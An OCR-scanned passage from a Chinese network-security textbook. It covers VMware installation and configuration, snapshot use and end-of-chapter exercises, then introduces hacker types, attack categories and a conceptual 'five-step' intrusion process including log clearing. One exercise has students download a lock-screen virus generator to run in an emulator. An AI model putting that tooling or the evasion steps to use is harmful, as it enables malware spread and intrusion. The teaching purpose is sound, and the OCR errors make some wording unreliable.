目前 ,虚拟 化 技术 已 经 非常 成 熟 ,伴随 着 产品 如 雨后春笋 般 地 出 现 , 如 VMware、Virtual 
PC、Xen、Parallels、Virtuozzo 等 。VMware Workstation 是 VMware 公司 的 专业 虚拟 机 软 
件 , 可 以 “虚拟 " 现 有 的 主流 操作 系统 .而 且 使 用 简单 ,容易 上 手 。 

安装 VMware Workstation 12 Pro 的 具体 操作 步骤 如 下 。 

(1) 下 载 VMware 12 Pro。 

(2) 安装 前 先 看 一 下 本 机 Windows 系统 是 否 为 64 位 ,如 果 是 32 位 操作 系统 目前 只 能 
安装 低 版 本 。 

(3) 接受 许可 协议 ,默认 安装 ,可 以 选择 要 安装 的 文件 路 径 。 

(4) 安装 完成 后 ,如 图 2-20 所 示 。 可 输入 许可 证 进行 认证 ,也 可 以 直接 单 击 “ 完 成 ”按钮 
进行 试用 。 
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图 2-20 VMware 安装 完成 











(5) 当然 ,也 可 以 进行 静默 安装 。 双 击 打开 文本 文档 后 输入 以 下 内 容 。 


@echo off 
echo VMware 12 Pro 正在 安装 ,请 耐心 等 待 ! 
vmwareworkstationrj12. 0.0.64202.1442972430. exe /s /pass /v/qn EULAS AGREED= 1 


INSTALLDIR=" -- 安装 路 径 -- ”ADDLOCAL = ALL SERIALNUMBER = " -- 许可 证 -一 " 
echo VMware 12 Pro 安装 完成 ! 
pause 


把 文本 文档 另存 为 BAT 文件 运行 。 
(6) 安装 完成 后 ,打开 设备 管理 器 ,展开 * 网 络 适 配器 ”节点 ,可 以 看 到 添加 的 两 块 虚拟 
网 卡 ,如 图 2-21 所 示 。 
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图 2-21 VMware 添加 的 虚拟 网 卡 








> 2.4.2 配置 VMware 虚拟 机 


在 安装 虚拟 操作 系统 前 ,一定 要 先 配 置 好 VMware 虚拟 机 ,下 面 介绍 配置 过 程 。 
(1) 运行 VMware Workstation ,选择 创建 新 的 虚拟 机 ,打开 新 建 虚拟 机 向 导 对 话 框 。 
如 图 2-22 所 示 。 
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2-22 VMware 新 建 虚拟 机 


(2) 在 新 建 虚 拟 机 向 导 对 话 框 中 ,一 般 选择 典型 选项 进行 配置 ,或 者 也 可 以 选用 自 定义 
选项 。 

(3) 选择 配置 要 安装 的 操作 系统 ,此 处 先 选择 * 稍 后 安装 操作 系统 " 单 选 按钮 ,如 图 2-23 
所 示 。 











安装 客户 机 操作 系统 
虚拟 机 如 同 攀 理 机 ， 需 要 操作 条 统 。 您 将 如 何 安装 容 户 机 操作 系统 ? 
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图 2-23 ”安装 配置 虚拟 机 的 操作 系统 的 安装 来 源 
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(4) 假设 安装 Windows 7 的 64 位 操作 系统 . 则 在 图 2-23 中 单 击 “ 下 一 步 ” 按 钮 后 ,显示 
如 图 2-24 所 示 界 面 。 
新 建 虚 攻 机 向 导 


选择 客户 机 操作 系统 
此 虚拟 机 中 将 安装 哪 种 操作 系统 ? 















































图 2-24 选择 虚拟 机 要 安装 的 操作 系统 


(5) 单 击 * 下 一 步 ? 按 钮 ,命名 虚拟 机 中 ,设置 虚拟 机 的 名 称 为 Windows 7, 并 设置 虚拟 机 
文件 所 在 的 路 径 。 

(6) 接 下 来 ,设置 指定 磁盘 容量 ,可 以 将 虚拟 机 存储 为 单个 文件 或 多 个 文件 ,本 例 中 选 
择 单个 文件 , 单 击 * 下 一 步 " 按 钮 ,可 完成 虚拟 机 的 创建 。 进 入 虚拟 机 存放 的 路 径 ,将 会 看 到 
已 生成 Windows 7 的 虚拟 机 文件 。 


> 2.4.3 安装 虚拟 操作 系统 


安装 虚拟 操作 系统 ,假设 准备 安装 Windows 7 的 64 位 操作 系统 。 

(1) 打开 虚拟 机 ,选择 Windows 7. vmx 文件 ,打开 已 经 初步 配置 的 虚拟 机 。 在 图 2-25 
中 ,可 以 单 击 “ 编 辑 虚拟 机 设置 "选项 ,进行 设置 。 

(2) 当然 ,也 可 以 选择 CD/DVD(SATA) 项 ,在 右 侧 “连接 ”栏目 中 选择 “使 用 物理 驱动 
器 ”或 “使 用 ISO 映像 文件 " 单 选 框 ,然后 单 击 “ 确 定 ” 按 钮 。 图 2-26 所 示 为 使 用 ISO 映像 文 
件 安装 操作 系统 。 

(3) 单 击 图 2-25 中 的 “开启 此 虚拟 机 ”选项 , 按 实 际 安装 操作 系统 的 方式 进行 , 即 可 完成 
虚拟 机 系统 的 安装 。 

需要 说 明 的 问题 : 在 用 虚拟 机 安装 操作 系统 时 ,默认 的 网 络 适配器 是 NAT 方式 。 
VMware 提供 三 种 工作 模式 : 桥接 (bridge) .NAT( 网 络 地 址 转换 ) 和 hostronly( 主 机 模式 ) 。 
它们 的 区 别 如 下 。 


——@® 
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图 2-25 安装 操作 系统 时 设置 虚拟 机 
































设备 摘要 设备 状态 
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2-26 ”使 用 ISO 文件 安装 Windows 7 
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Q@ 桥接 模式 。 在 桥接 模式 下 ,VMware 虚拟 出 来 的 操作 系统 就 像 是 局 域 网 中 的 一 台独 
立 的 主机 (主机 和 虚拟 机 处 于 对 等 地 位 ) . 它 可 以 访问 网 内 任何 一 台 机 器 。 在 桥接 模式 下 , 往 
往 需要 为 虚拟 主机 配置 IP 地 址 、 子 网 掩 码 等 (注意 虚拟 主机 的 IP 地址 要 和 主机 IP 地 址 在 
同一 网 段 ) 。 使 用 桥接 模式 的 虚拟 系统 和 主机 的 关系 ,就 如 同 连接 在 一 个 集线器 上 的 两 台 计 
算 机 。 

@ NAT 模式 。 在 NAT 模式 下 ,虚拟 系统 需要 借助 NAT( 网 络 地 址 转换 ) 功 能 ,通过 宿 
主机 器 所 在 的 网 络 来 访问 公 网 。 也 就 是 说 ,使 用 NAT 模式 虚拟 系统 可 把 物理 主机 作为 路 由 
器 访问 互联 网 。NAT 模式 下 的 虚拟 系统 的 TCP/IP 配置 信息 是 由 VMnet8(NAT) 虚 拟 网 
络 的 DHCP 服务 器 提供 的 ,无 法 进行 手工 修改 ,因此 虚拟 系统 也 就 无 法 和 本 局 域 网 中 的 其 
他 真实 主机 进行 通信 。 采 用 NAT 模式 最 大 的 优势 是 虚拟 系统 接 人 互联 网 非常 简单 ,不 需要 
进行 任何 其 他 的 配置 ,只 需要 宿主 机 器 能 访问 互联 网 即 可 。 

@ 主机 模式 。 主 机 模式 下 ,真实 环境 和 虚拟 环境 是 隔离 开 的 。 在 这 种 模式 下 ,所 有 的 
虚拟 系统 是 可 以 相互 通信 的 ,但 虚拟 系统 和 真实 的 网 络 被 隔离 开 ( 虚 拟 系统 和 宿主 机 器 系统 
是 可 以 相互 通信 的 ,相当 于 这 两 台 机 器 通过 双 绞 线 互 连 )。 这 应 该 是 最 为 灵活 的 方式 ,如 果 
有 兴趣 可 以 进行 各 种 网 络 实验 。 和 NAT 唯一 的 不 同 是 ,此 种 方式 下 ,没有 地 址 转换 服务 , 因 
此 ,默认 情况 下 ,虚拟 机 只 能 到 主机 访问 。 


PP 2.4.4 VMware Tools 安装 


VMware Tools 是 VMware 虚拟 机 中 自 带 的 一 种 增强 工具 ,用 于 增强 虚拟 显卡 、 虚 拟 硬 
盘 的 性 能 ,以 及 同步 虚拟 机 与 主机 时 钟 的 驱动 程序 。 只 有 在 VMware 虚拟 机 中 安装 好 了 
VMware Tools, 才 能 实现 主机 与 虚拟 机 之 间 的 文件 共享 ,同时 可 支持 自由 拖 忠 的 功能 ,鼠标 也 
可 在 虚拟 机 与 主机 之 前 自由 移动 (不 用 再 按 Ctrl 十 Alt 组 合 键 ), 且 虚拟 机 屏幕 也 可 实现 全 
屏 化 。 

安装 VMware Tools 的 具体 操作 方法 如 下 。 

(1) 启动 已 安装 操作 系统 的 虚拟 机 。 单 击 虚拟 机 屏幕 下 方 的 “安装 工具 ”按钮 。 或 在 虚 
拟 机 菜单 中 ,选择 “安装 VMware Tools. ”选项 。 

(2) 打开 安装 向 导 。 单 击 “ 下 一 步 ” 按 钮 ,可 选择 “典型 安装 、 完 整 安装 或 自 定义 安装 ” 选 
项 , 单 击 “ 下 一 步 ” 按 钮 ,安装 完成 。 

重启 系统 后 即 完成 工具 的 安装 。 


PP 2.4.5 VMware 快照 的 使 用 


磁盘 快照 是 虚拟 机 磁盘 文件 (VMDK ) 在 某 个 点 的 即时 副本 。 系 统 崩 溃 或 系统 异常 时 ， 
可 以 通过 使 用 恢复 到 快照 来 保持 磁盘 文件 系统 和 系统 存储 。 其 他 章节 中 介绍 的 黑客 软件 在 
安装 和 使 用 时 ,应 该 利用 快照 的 功能 来 完成 练习 。VMware 快照 是 VMware Workstation 
中 的 一 个 特色 功能 。 


一 一作 


和 MA 








快照 的 增长 率 由 服务 器 上 磁盘 写 人 活动 发 生 次 数 决定 。 拥 有 磁盘 写 人 增强 应 用 的 服务 
器 ,诸如 SQL 和 Exchange 服务 器 ,它们 的 快照 文件 增长 很 快 。 另 外 ,拥有 大 部 分 静态 内 容 
和 少量 磁盘 写 人 的 服务 器 ,诸如 Web 和 应 用 服务 器 ,它们 的 快照 文件 增长 率 很 低 。 当 创建 
许多 快照 时 ,新 delta 文件 被 创建 并 且 原 先 的 delta 文件 变 成 只 读 的 了 。 每 个 拥有 大 量 快照 
的 delta 文件 可 能 变 得 和 原始 磁盘 文件 一 样 大 。 

具体 操作 步骤 如 下 。 

(1) 启动 VMware, 进 入 Windows 系统 ,在 桌面 上 新 建文 件 夹 “ 快 照 测试 1”。 创 建 完 
后 选择 虚拟 机 菜单 栏 的 “虚拟 机 ”一 “快照 >“ 拍摄 快照 ”命令 ,如 图 2-27 所 示 。 
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2-27 创建 快照 
(2) 快照 默认 保存 在 VM 文件 夹 下 ,生成 两 个 文件 。 如 Windows Server 2012-Snapshotl. 


vmem 和 Windows Server 2012-Snapshotl. vmsn。 
(3) 在 桌面 上 新 建文 件 夹 "快照 测试 2”, 继 续 创建 快照 。 创 建 完成 后 ,参看 图 2-27 ,打开 
快照 管理 器 ,如 图 2-28 所 示 。 


回 Windows Server 2012 - 快照 管理 器 








一 人 一 6 一 


快照 1 ”快照 2 ”当前 位 置 





图 2-28 创建 快照 测试 2 后 快照 管理 器 


(4) 在 快照 管理 器 中 , 右 击 打开 “快照 1” 的 快捷 菜单 ,选择 “ 转 到 快照 ”选项 。 恢 复 到 桌 
面 只 有 “快照 测试 1 文件 夹 的 状态 。 此 时 ,再 在 桌面 上 新 建文 件 夹 “ 快 照 测试 3”。 再 为 当前 
状态 创建 快照 。 此 时 ,打开 快照 管理 器 ,如 图 2-29 所 示 。 

(5) 在 快照 管理 器 中 , 右 击 打开 “快照 1” 的 快捷 菜单 ,还 可 以 设置 “删除 当前 快照 ”( 仅 删 
除 快照 1 ) 和 “删除 快照 及 子 项 ”删除 快 照 1.2、3) 等 操作 。 
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图 2-29 创建 快照 测试 3 后 的 快照 管理 器 界面 





课外 练习 
由 11. 简 答 是 


(1) 了 解 了 P 的 直接 连接 和 间接 连接 。 回 答 问 题 : 两 台 主机 用 HUB 连接 在 一 起 ,一 台 主 
机 了 P 了 是 192.168.1.11/24.ping 另 一 台 IP 地 址 为 192. 168. 11. 1/24 的 计算 机 能 否 ping 通 ， 
为 什么 ? 

(2) 某 公司 有 30 台 计 算 机 ,要 求 在 一 个 C 类 网 192. 168. 10. 0 中 划分 子 网 ,要 求 每 个 子 
网 内 的 计算 机 个 数 不 能 超过 6 台 , 应 该 怎样 划分 ? 写 出 子 网 掩 码 、 其 中 一 个 子 网 号 及 该 子 网 
的 广播 地 址 。 

(3) 简 述 IP 地 址 、 子 网 掩 码 、 网 关 .DNS、DHCP 的 作用 。 参 看 下 面 的 数据 说 明 。 








IPv4 地 址 … .: 192. 168. 1. 105( 首 选 ) 
子 网 掩 码 … 255,255, 25540 
获得 租约 的 时 间 2017 年 3 月 21 日 17:57:51 


租约 过 期 的 时 间 …… : 2017 年 3 月 23 日 18:37:40 
默认 网 关 …………… : 192. 168. 1.1 
DHCP 服务 器 .……… : 192. 168. 1. 1 
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DNS 服务 器 …………: 8. 8. 8.8 
192. 168. 1. 1 
114. 114. 114. 114 


12. 操作 题 


(1) 用 VMware 虚拟 机 安装 Windows Server 2008 R2 的 虚拟 操作 系统 。 并 配置 以 桥接 
的 方式 运行 .CPU 是 4 核 ,内 存 为 2GB。 

(2) 下 载 安装 夜 神 安 卓 模拟 器 (https://www. yeshen. com/) ,熟悉 模拟 器 的 使 用 。 下 
载 “ 锁 机 病毒 生成 器 ,利用 模拟 器 ,查看 一 下 运行 效果 。 


黑客 攻防 与 检测 防御 





本 章 介绍 黑客 的 定义 和 行为 ,并 着 重 介绍 黑客 在 进行 攻击 前 常 利 用 扫描 和 嗅 探 工具 对 
目标 计算 机 进行 的 分 析 过 程 ,以 及 如 何 合理 利用 扫描 和 嗅 探 工具 ,来 实现 系统 的 安全 防御 


配置 
多 > 知识 点 


(1) 认识 黑客 。 

(2) 常见 的 扫描 工具 。 

(3) 常见 的 嗅 探 工具 。 

(4) 实现 简单 的 网 络 监控 。 
(5) 一 般 的 检测 和 防御 设置 。 


局 教学 B 标 


(1) 了 解 什么 是 黑客 及 黑客 的 分 类 。 

(2) 了 解 黑客 攻击 的 目的 及 攻击 步骤。 

(3) 熟悉 黑客 常用 的 攻击 方法 及 应 用 。 

(4) 理解 防范 黑客 的 具体 有 效 措施 。 

(5) 掌握 黑客 攻击 过 程 ,并 防御 黑客 攻击 。 

(6) 掌握 入 侵 检 测 与 防御 系统 的 概念 、 功 能、 特点 和 应 用 方法 。 
(7) 掌握 网 络 扫描 ,人 侵 攻 击 模拟 、 检 测 防御 工具 的 使 用 。 
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认识 黑客 


信者 


> 3.1.1 黑客 的 概念 和 分 类 


说 到 网 络 安全 就 离 不 开 黑 客 ,黑客 原 指 一 个 拥有 熟练 计算 机 技术 的 人 ,但 大 部 分 的 媒体 
将 “黑客 ”用 于 指 计算 机 侵入 者 。 因 为 这 个 原因 ,黑客 又 有 白 帽 黑客 . 灰 帽 黑客 和 黑 帽 黑客 的 
说 法 。 白 帽 黑 客 是 指 有 能 力 破坏 计算 机 安全 但 无 恶意 目的 的 黑客 。 白 帽子 一 般 有 清楚 的 道 
德 规范 ,并 常常 试图 通过 企业 合作 改善 被 发 现 的 安全 漏洞 。 而 灰 帽 黑客 是 指 对 于 伦理 和 法 
律 “ 暧 昧 不 清 ” 的 黑客 。 

黑客 ,最 早 源 自 英文 hacker, 所 谓 黑客 都 是 水 平 高 超 的 计算 机 专家 ,尤其 是 程序 设计 人 
员 。 除 此 之 外 ,还 有 红 客 , 指 代表 我 国人 民 的 意志 ,维护 国家 利益 的 黑客 ; 蓝 客 , 指 信仰 自 
由 ,提倡 爱国 主义 的 黑客 ,他 们 用 自己 的 力量 来 维护 网 络 的 和 平 ; 骇 客 ,是 cracker 的 音译 ， 
就 是 “破解 者 ”的 意思 ,从 事 恶 意 破解 商业 软件 、 恶 意 信 侵 别人 的 网 站 等 事务 。 

【案例 3-1】 中 国 网 络 系统 遭 到 最 大 规模 攻击 。 工 业 和 信息 化 部 通信 保障 局 2013 年 
8 月 26 日 透露 ,从 8 月 25 日 零 时 起 ,中 国 互 联网 络 信息 中 心 管 理 运行 的 国家 .cn 顶级 域名 
系统 遭受 大 规模 拒绝 服务 攻击 ,利用 僵尸 网 络 向 .cn 顶级 域名 系统 持续 发 起 大 量 针对 某 游戏 
私服 网 站 域名 的 查询 请 求 , 峰 值 流量 较 平 常 激增 近 1 000 倍 ,造成 .cn 顶级 域名 系统 的 互联 
网 出 口 带宽 短期 内 严重 拥塞 ,对 一 些 用 户 正常 访问 造成 影响 。 按 照 专项 应 急 预案 ,及 时 采取 
应 急 处 置 措施 ,两 小 时 后 .cn 域名 解析 服务 逐步 恢复 正常 。 


PP 3.1.2 黑客 攻击 的 主要 途径 


Li 黑客 攻击 的 漏洞 


黑客 攻击 主要 借助 计算 机 网 络 系统 的 漏洞 。 漏 洞 又 称 系统 缺陷 ,是 在 硬件 .软件 .协议 
的 具体 实现 或 系统 安全 策略 上 存在 的 缺陷 ,它们 可 使 攻击 者 能 够 在 未 授权 的 情况 下 访问 或 
破坏 系统 。 黑 客 的 产生 与 生存 是 由 于 计算 机 及 网 络 系统 存在 漏洞 和 隐患 , 才 使 黑客 攻击 有 
机 可 乘 。 产 生 漏洞 并 为 黑客 所 利用 的 原因 如 下 。 

(1) 计算 机 网 络 协议 本 身 的 缺陷 。 网 络 采用 的 Internet 基础 协议 TCP/IP, 设 计 之 初 就 
没有 重点 考虑 安全 方面 问题 ,注重 开放 和 互联 而 过 分 信任 协议 ,使 协议 的 缺陷 更 加 突出 。 

(2) 系统 研发 的 缺陷 。 软 件 研 发 没有 很 好 地 解决 大 规模 软件 可 靠 性 问题 ,致使 系统 存 
在 的 缺陷 (Bug) ,主要 是 程序 在 设计 编写、 测试 .设置 或 维护 时 ,产生 的 问题 或 漏洞 。 

(3) 系统 配置 不 当 。 有 许多 软件 是 针对 特定 环境 配置 研发 的 , 当 环 境 变换 或 资源 配置 
不 当时 ,就 可 能 使 本 来 很 小 的 缺陷 变 成 漏洞 。 

(4) 系统 安全 管理 中 的 问题 。 快 速 增长 的 软件 的 复杂 性 、 训 练 有 素 的 安全 技术 人 员 的 
不 足以 及 系统 安全 策略 的 配置 不 当 , 增 加 了 系统 被 攻击 的 机 会 。 
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2 黑客 入 侵 通 道 


(1) 网 络 端口 。 计 算 机 是 通过 网 络 端口 实现 外 部 通信 ,黑客 攻击 是 将 系统 和 网 络 设置 
中 的 各 种 端口 作为 人 侵 通 道 。 这 里 的 端口 是 逻辑 意义 上 的 端口 ,是 指 网 络 中 面向 连接 服务 
和 无 连接 服务 的 通信 协议 端口 ,是 一 种 抽象 的 软件 结构 ,包括 一 些 数据 结构 和 1/O( 输 入 / 输 
出 ) 缓 冲 区 .通信 传输 与 服务 的 接口 。 网 络 端口 分 类 标准 有 多 种 , 按 端口 号 分 布 可 分 为 三 段 : 
公认 端口 (0 一 1023) .注册 端口 (1024 一 49151) ,动态 /私有 端口 (49152 一 65535)。 按 协议 类 
型 可 以 将 端口 划分 为 TCP 和 UDP 端口 。 

(2) 端口 机 制 的 由 来 。 由 于 大 多 数 操作 系统 都 支持 多 程序 (进程 ) 同 时 运行 ,目的 主机 
需要 知道 将 接收 到 的 数据 包 再 回 传 送 给 众多 同时 运行 的 进程 中 的 哪个 ,同时 本 地 操作 系统 
给 哪些 有 需求 的 进程 分 配 协议 端口 。 当 目的 主机 通过 网 络 系统 接收 到 数据 包 以 后 ,根据 报 
文 首部 的 目的 端口 号 ,将 数据 发 送 到 相应 端口 ,与 此 端口 相对 应 的 那个 进程 将 会 领取 数据 并 
等 待 下 一 组 数据 的 到 来 。 一 般 源 端 口号 是 由 操作 系统 动态 生成 的 一 个 从 1024 一 65535 的 
号 码 。 


3.1.3 黑客 攻击 的 目的 及 过 程 


黑客 实施 攻击 的 步骤 ,根据 其 攻击 的 目的 .目标 和 技术 条 件 等 实际 情况 而 不 尽 相同 。 本 
小 节 概 括 性 地 介绍 网 络 黑客 攻击 目的 、 种 类 及 过 程 。 


上 1. 黑客 攻击 的 目的 及 种 类 


1) 黑客 攻击 的 目的 

【案例 3-2〗 据 新 华 社 2015 年 5 月 29 日 电 ,近年 来 各 国 围 绕 着 “网 络 空间 ”的 攻防 战 鳄 
演 愈 烈 , 奇 虎 360 科技 有 限 公 司 披露 一 起 针对 中 国 的 国家 级 黑客 攻击 。 境 外 黑客 组 织 “ 海 莲 
花 (OceanLotus)”, 自 2012 年 4 月 起 针对 中 国政 府 的 海事 机 构 \ 海 域 建设 部 门 .科研 院 所 等 ， 
展开 了 精密 组 织 的 网 络 攻击 。 主 要 使 用 木马 病毒 APT( 高 级 持续 性 威胁 ) 特 种 样本 100 余 
个 ,侵入 截获 、 控 制 政府 、 外 包 商 、 行 业 专 家 等 目标 人 和 群 的 计算 机 ,意图 获取 机 密 情 报 并 掌握 
中 方 动向 ,甚至 操纵 该 计算 机 自动 发 送 相关 情报 。 

黑客 实施 攻击 的 目的 概括 地 说 有 两 种 : 得 到 物质 利益 ; @ 满 足 精 神 需求 。 物 质 利益 
是 指 获 取 金 钱 和 财物 ; 精神 需求 是 指 满足 个 人 心理 欲望 。 

常见 的 黑客 行为 有 攻击 网 站 ` 盗 窃 密码 或 重要 资源 、 自 改 信息 、 恶 作 剧 、 探 寻 网 络 漏洞 、 
获取 目标 主机 系统 的 非法 访问 权 等 . 非 授 权 访问 或 恶意 破坏 等 。 

实际 上 ,黑客 攻击 是 利用 被 攻击 方 网 络 系统 自身 存在 的 漏洞 ,通过 使 用 网 络 命令 和 专用 
软件 侵入 网 络 系统 实施 攻击 。 具 体 的 攻击 目的 与 下 述 攻击 种 类 有 关 。 

2) 黑客 攻击 手段 的 种 类 

黑客 网 络 攻击 手段 的 类 型 主要 有 以 下 几 种 。 

(1) 网 络 监 听 。 利 用 监听 嗅 探 技 术 获 取 对 方 网 络 上 传输 的 信息 。 网 络 嗅 探 最 开始 是 应 
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用 于 网 络 管理 ,如 同 远程 控制 软件 一 样 ,后 来 其 强大 功能 逐渐 被 黑客 利用 。 

(2) 拒绝 服务 攻击 。 是 指 利用 发 送 大 量 数据 包 而 使 服务 器 因 疲 于 处 理 相 关 服 务 无 法 进 
行 . 系 统 衣 溃 或 资源 耗 尽 ,最 终 使 网 络 连接 堵塞 .暂时 或 永久 性 瘫痪 的 攻击 手段 。 攻 击 是 最 
常见 的 一 种 攻击 类 型 ,目的 是 利用 拒绝 服务 攻击 破坏 正常 运行 。 

(3) 欺骗 攻击 。 主 要 包括 利用 源 IP 地 址 欺骗 和 源 路 由 欺骗 攻击 。 

@ 源 IP 地 址 欺骗 。 一 般 认 为 若 数据 包 能 使 其 自身 沿 着 路 由 到 达 目 的 地 , 且 应 答 包 也 可 
回 到 源 地 , 则 源 IP 地 址 一 定 是 有 效 的 ,盗用 或 冒 用 他 人 的 IP 地 址 即 可 进行 欺骗 攻击 。 

@ 源 路 由 欺骗 攻击 。 数 据 包 通 常 从 起 点 到 终点 ,经 过 的 路 径 由 位 于 两 端点 间 的 路 由 器 
决定 ,数据 包 本 身 只 知 去 处 ,而 不 知 其 路 径 。 源 路 由 可 使 数据 包 的 发 送 者 将 此 数据 包 要 经 过 
的 路 径 写 在 数据 包 中 ,使 数据 包 循 着 一 个 对 方 不 可 预料 的 路 径 到 达 目 的 主机 。 

【案例 3-3】 大 量 木马 病毒 伪装 成 “东莞 艳舞 视频 "网 上 疯 传 。2014 年 2 月 ,央视 (新 闻 
直播 间 ) 曝 光 了 东莞 的 色情 产业 链 ,一 时 间 有 关东 莞 信息 点 击 量 剧 增 ,与 之 有 关 的 视频 、 图 片 
信息 也 蜂拥 而 至 。 仅 过 去 的 24 小 时 内 , 带 有 “东莞 ”关键 词 的 木马 色情 网 站 (伪装 的 “钓鱼 网 
站 ”) 拦 截 量 猛 增 11.6%, 相 比 平时 多 出 近 10 万 次 。 大 量 命名 为 “东莞 艳舞 视频 "东莞 桑拿 
酒店 视频 ?的 木马 和 广告 插件 等 恶意 软件 出 现 , 致 使 很 多 用 户 机 密 信息 被 盗 。 

(4) 缓冲 区 溢出 。 向 程序 的 缓冲 区 写 超 长 内 容 , 可 造成 缓冲 区 溢出 ,从 而 破坏 程序 的 堆 
栈 , 使 程序 转 而 执行 其 他 指令 。 如 果 这 些 指 令 是 放 在 有 Root 权限 的 内 存 中 ,那么 一 旦 这 些 
指令 运行 ,黑客 就 获得 程序 的 控制 权 , 以 Root 权限 控制 系统 ,达到 入 侵 目 的 。 

(5) 病毒 及 密码 攻击 。 攻 击 方法 包括 蛮 力 攻击 (Brute Force Attack) ,特洛伊 木马 程序 、 
IP 欺骗 和 报 文 嗅 探 。 尽 管 报 文 嗅 探 和 IP 欺骗 可 捕获 用 户 账 号 和 密码 ,但 密码 攻击 常 以 蛮 力 
攻击 反复 试探 ,验证 用 户 账 号 或 密码 。 特 别 是 常用 木马 病毒 等 进行 攻击 ,获取 资源 的 访问 
权 , 窃 取 与 账户 用 户 的 权利 ,为 以 后 再 次 人 侵 创建 后 门 。 

(6) 应 用 层 攻击 。 应 用 层 攻 击 可 使 用 多 种 不 同 的 方法 实施 ,常见 方法 是 用 服务 器 上 的 应 
用 软件 (如 SQL Server、FTP 等 ) 缺 陷 , 获 得 计算 机 的 访问 权 和 应 用 程序 所 需 账户 的 许可 权 。 


12. 黑客 攻击 的 过 程 


黑客 的 攻击 步骤 相近 ,整个 攻击 过 程 有 一 定 规律 , 常 称 为 “攻击 五 部 曲 ”。 

1) 隐藏 IP 地 址 

隐藏 卫 就 是 隐藏 黑客 的 全 地址 , 即 隐藏 黑客 所 使 用 计算 机 的 真正 地 理 位 置 ,以 免 被 发 现 。 
典型 的 隐藏 真实 的 耳 地 址 的 方法 ,主要 利用 被 控制 的 其 他 主机 作为 跳板 ,有 以 下 两 种 方式 。 

(1) 一 般 先 人 侵 到 连接 互联 网 上 的 某 一 台 计 算 机 ,俗称 "肉鸡 ?或 “ 倪 偶 机 ,然后 利用 这 
台 计 算 机 再 实施 攻击 ,即使 被 发 现 , 也 是 “肉鸡 ”的 IP 地 址 。 

(2) 做 多 级 跳板 “Socks 代理 ”, 可 以 隐蔽 入侵 者 真实 的 卫 地 址 ,只 留 下 代理 计算 机 的 IP 
地 址 。 例 如 ,通常 黑客 攻击 某国 的 站 点 ,一 般 选 择 远 距离 的 另 一 国家 的 计算 机 为 “肉鸡 ”, 进 
行 跨国 攻击 ,这 类 案件 较 难 侦破 。 

2) 踩点 扫描 准备 

踩点 扫描 主要 是 通过 各 种 途径 和 手段 对 所 要 攻击 的 目标 对 象 信息 进行 多 方 探寻 搜集 ， 
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确保 具体 信息 准确 ,确定 攻击 时 间 和 地 点 等 。 踩 点 是 黑客 搜集 信息 ,勾勒 出 整个 网 络 的 布 
局 , 找 出 被 信任 的 主机 ,主要 是 网 络 管理 员 使 用 的 机 器 或 是 一 台 被 认为 是 很 安全 的 服务 器 。 
扫描 是 利用 各 种 扫描 工具 寻找 漏洞 。 扫 描 工 具 可 以 进行 下 列 检查 : TCP 端口 扫描 ; RPC 服 
务 列表 ; NFS 输出 列表 ; 共享 列表 ; 默认 账号 检查 ; Sendmail、IMAP、POP3、RPC status 和 
RPC mounted 有 缺陷 版 本 检测 。 进 行 完 这 些 扫描 ,黑客 对 哪些 主机 有 机 可 乘 已 胸有成竹 。 
但 这 种 方法 是 否 成 功 要 看 网 络 内 、 外 部 主机 间 的 过 滤 策 略 。 

3) 获得 特权 

获得 特权 即 获得 管理 权限 。 目 的 是 通过 网 络 登 录 到 远程 计算 机 上 ,对 其 实施 控制 ,达到 
攻击 目的 。 获 得 权限 方式 分 为 6 种 : 由 系统 或 软件 漏洞 获得 系统 权限 ; 由 管理 漏洞 获取 管 
理 员 权限 ; 由 监听 获取 敏感 信息 ,进一步 获得 相应 权限 ; 由 弱 口 令 或 穷 举 法 获得 远程 管理 员 
的 用 户 密码 ; 由 攻破 与 目标 主机 有 信任 关系 的 另 一 台 计 算 机 ,进而 得 到 目标 主机 的 控制 权 ; 
由 欺骗 获得 权限 以 及 其 他 方法 。 

4) 种 植 后 门 

种 植 后 门 是 指 黑客 利用 程序 的 漏洞 进入 系统 后 安装 的 后 门 程序 ,以 便 以 后 可 以 不 被 察 
觉 地 再 次 进入 系统 。 多 数 后 门 程序 (木马 ) 都 是 预先 编译 好 的 ,只 需要 想 办 法 修改 时 间 和 权 
限 就 可 以 使 用 。 黑 客 一 般 使 用 特殊 方法 传递 这 些 文件 ,以 便 不 留 下 FTP 记录 。 

5) 隐身 退出 

通常 ,黑客 一 旦 确认 自己 是 安全 的 ,就 开始 发 动 攻击 侵入 网 络 , 为 了 避免 被 发 现 ,黑客 在 
入 侵 完毕 可 以 及 时 清除 登录 日 志和 其 他 相关 的 系统 日 志 , 及 时 隐身 退出 。 

黑客 攻击 企业 内 部 网 的 过 程 如 图 3-1 所 示 。 


@ 用 ping 命 令 查询 企业 内 部 网 中 服务 器 的 IP 地 址 








@ 用 IP Network Browser 扫 描 企 业内 部 网 的 IP 地 址 








图 用 PortScan 扫 描 企 业内 部 网 的 端口 








图 用 WWW hack 入 侵 企业 内 部 网 的 E-mail 服务 器 








回 破解 Internet 账 号 与 口令 (或 密码 ) 








@@ 用 Lexion 扫 描 企 业内 部 网 











@ 植 入 特洛伊 木马 
3-1 黑客 攻击 企业 内 部 网 的 过 程 








3.2 常见 的 扫描 工具 


黑客 在 确定 攻击 目标 时 .通常 会 使 用 一 些 专门 的 扫描 工具 对 目标 计算 机 或 某 个 范围 内 人 P 
地 址 的 计算 机 进行 扫描 ,从 扫描 结果 中 分 析 这 些 计算 机 的 弱点 ,从 而 确定 攻击 目标 和 攻击 手段 。 


@— 


E 





as 





Pp 3.2.1 扫描 服务 与 端口 


黑客 通过 端口 扫描 可 在 系统 中 寻找 开放 的 端口 和 正在 运行 的 服务 ,从 而 知道 目标 主机 
操作 系统 的 详细 信息 。 目 前 网 络 中 大 量 主 机 /服务 器 的 口令 为 空 口令 或 弱 口令 ,黑客 只 须 利 
用 专用 扫描 器 , 即 可 轻松 控制 存在 这 种 弱 口 令 的 主机 。 

端口 扫描 攻击 采用 探测 技术 ,常用 端口 扫描 攻击 如 下 。 

(1) 秘密 扫描 : 不 能 被 用 户 使 用 审查 工具 检测 出 来 的 扫描 。 

(2) Socks 端口 探测 : Socks 是 一 种 允许 多 台 计 算 机 共享 公用 Internet 连接 的 系统 。 如 
果 Socks 配置 有 错误 ,将 能 允许 任意 的 源 地 址 和 目标 地 址 通行 。 

(3) 跳跃 扫描 : 攻击 者 快速 地 在 Internet 中 寻找 可 供 他 们 进行 跳跃 攻击 的 系统 。FTP 
跳跃 扫描 就 是 使 用 了 FTP 协议 自身 的 一 个 缺陷 。 其 他 应 用 程序 ,如 电子 邮件 服务 器 、 
